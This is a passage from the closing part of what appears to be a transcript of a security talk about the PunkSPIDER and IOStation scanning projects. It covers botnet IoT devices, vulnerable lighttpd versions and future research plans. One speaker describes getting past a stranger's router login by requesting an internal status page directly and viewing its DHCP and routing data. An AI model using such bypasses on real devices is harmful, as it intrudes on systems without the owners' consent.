40:36 - You know, I did dig in to look at what devices were actually being part of this botnet, and it definitely look a lot of D-Link, Netgear, and Huawei gear.

40:43 - I saw IPCameras, DVRs. There were some GPON devices, which was a little interesting.

40:48 - I didn’t really see anything that indicated it was part of any sort of like corporate structure or anything.

40:53 - But the software being used are a lot of web servers, but they’re all like kind of small lightweight ones that you see being used in sort of embedded devices and things like that, like home routers.

41:02 - And I did notice that the lighttpd version that I saw, a lot of actually 1. 4. 39 had just a ton of CVEs and many of them were just like blanket, you know, remote code execution vulnerabilities and stuff, which was kind of cool.

41:17 - So I did kind of poke around at a few of these things, like what they were showing, and I found this kind of cool example.

41:21 - This was just somebody part of the botnet. It has an interface that looks a lot like dealing.

41:27 - I didn’t try to login or anything like that.

41:28 - The links on the top made you login, but I did dig around the JavaScript ‘cause it really wasn’t that much actually.

41:34 - And I saw that it was crafting these links, so I went to a few of them directly like a sys status. asp, for example.

41:41 - And, you know, I guess it doesn’t always want you to login.

41:44 - So if you go to them directly at the login page actually, works, or sorry, is bypassed.

41:48 - And I was able to see all the internal DHB tables, and all the routing information and all that stuff.

41:53 - And, you know, while this isn’t some, you know, egregious vulnerability necessarily on its own right.

41:58 - It’s just kind of illustrating like, this is the kind of nonsense that is still all over the internet.

42:02 - Like I know security has been a hot topic. It’s getting better, I think, I think, anyway.

42:08 - But there’s still craziness like this, where this person’s router just like lets you login, and yeah, that’s kind of crazy to me.

42:15 - So, you know, we’re kind of running out of time here, but I’m sure the burning question in everyone’s mind is where’s this all going? So where where’s it going, Alex? - Right.

42:24 - So I just want to recap for everybody, right? So a couple of quick things.

42:28 - Created a hugely scalable system for fuzzing a fuckton of URLs.

42:31 - We’ve had a bunch of vulnerabilities in major websites.

42:34 - We’ve even found zero days in a popular forum technology, right? So obviously, the probably most important part of that is that we’re releasing that out to you all, the public.

42:47 - And we want to keep these results updated while still continuing to go extremely broad.

42:52 - Our target is still the entire internet. We’re not gonna let down on that target.

42:57 - We’re gonna continue engineering until we’ve reached that target and we can keep the records reasonably updated to a certain degree, right? So how can you kind of help us, right? So I mentioned throwing us ideas, obviously, it’s is really helpful, but download that extension.

43:13 - Use that CLI tool, start calling out websites, all of these things are really helpful and not only at the PunkSPIDER, but part of the mission of PunkSPIDER, really.

43:26 - We built this for you all. So feel pretty use it basically, is all.

43:34 - - As far as IOStation is concerned, you know, I think that continuing to transform my mindset from pure cybersecurity to evaluating risk and risk scoring is really interesting.

43:46 - So I wanna continue kind of going down that path.

43:48 - That’s not to say that there won’t still be the broad internet collection tools that have been working with and know and love, but it’s just that some of the newer features that are coming out probably will be geared towards that.

43:59 - Especially when it comes to critical infrastructure and industrial control systems, which for anyone paying attention to the news lately, I’m sure knows has been a bit of a hot button topic when it comes to certain pipelines, which may not be named.

44:09 - (laughs) But I think that’s a really fascinating area, and especially one that’s, you know, obviously, increasing importance.

44:18 - I know there’s a lot of utilities and things that have really ignored their cybersecurity posture, and they’re starting to get bit by it.

44:25 - And anyways, that’s something I think we need to look at.

44:28 - And the other one is a little bit more vague, but really trying to identify attacker infrastructure.

44:34 - Like are there things that we can be observing from the outside to identify what an attacker is using and how they’re organizing? But you know, maybe early or on the onset or whatever, as early as possible obviously is better.

44:47 - You know, is there software that can be probed and identified running across the internet? Are there any sort of particular techniques or patterns or signatures or anything like that that we can extract? You know, this one is not as well thought out.

45:01 - Obviously, it’s just something that I think we’re pretty interested in tracking down long-term, but I think that about wraps it up for us.

45:08 - So yeah, if you want to shoot us an email or whatever, feel free.

45:11 - You can, you know, visit our office, but Alex and I won’t be there, so.

45:15 - (laughs) - Yeah. Thanks everybody for coming in, and listening to our talk.

45:22 - We really appreciate it. And, you know, thank you all for taking the time to listen us, ramble on about the system, and I hope you really enjoyed it.

45:31 - - Yeah, thanks everyone. Take it easy. Bye bye.

45:34 - - Peace everybody. Later. .